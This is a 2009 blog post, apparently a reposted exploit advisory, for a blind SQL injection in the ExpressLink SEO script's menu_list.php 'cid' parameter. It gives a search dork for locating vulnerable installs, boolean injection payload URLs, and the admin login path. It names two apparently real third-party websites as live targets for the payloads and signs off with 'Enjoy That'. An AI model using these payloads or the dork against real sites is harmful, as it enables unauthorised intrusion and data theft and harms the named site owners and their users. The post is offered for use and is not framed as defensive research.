ExpressLink™ SEO Blind SQL Injection Vuln ~ matthews

Saturday, September 19, 2009

ExpressLink™ SEO Blind SQL Injection Vuln

8:08 PM matthews

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Details *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> type :: ( menu_list.php?cid= ) Blind Sql Injection Vulnerability

<>>><<>>> author :: ^s0n_g0ku^

<>>><<>>> Contact :: dh_4n[at]ymail[dot]com

<>>><<>>> Site :: http://xcode.or.id/

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Script information *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> script :: ExpressLink™ SEO

<>>><<>>> Vendor :: http://www.wevioexpress.com/

<>>><<>>> dork :: kreasikan Pikiranmu

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Exploit *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> Exploit ::

http://www.site.com/menu_list.php?cid=381

<>>><<>>> Examp ::

http://www.poloagawa.com/menu_list.php?cid=381+and+1=1 <<< Thrue
http://www.poloagawa.com/menu_list.php?cid=381+and+1=2 <<< false

http://www.empireallergy.com/menu_list.php?cid=1+and+1=1 <<< Thrue
http://www.empireallergy.com/menu_list.php?cid=1+and+1=2 <<< false

<>>><<>>> Admin Login Page ::

http://site.com/admin/

Enjoy That

Posted in: vulnerabilities

matthews

Saturday, September 19, 2009

ExpressLink™ SEO Blind SQL Injection Vuln

Popular Posts

Link for education

About Me

Blog Archive

Categories

news from Kecoak Elektronik Indonesia

news from SecurityFocus Vulnerabilities

adsensecamp

adbrite2

News from milw0rm

Labels

Blog Archive

Blogger templates

Blogger news

Location

Blogroll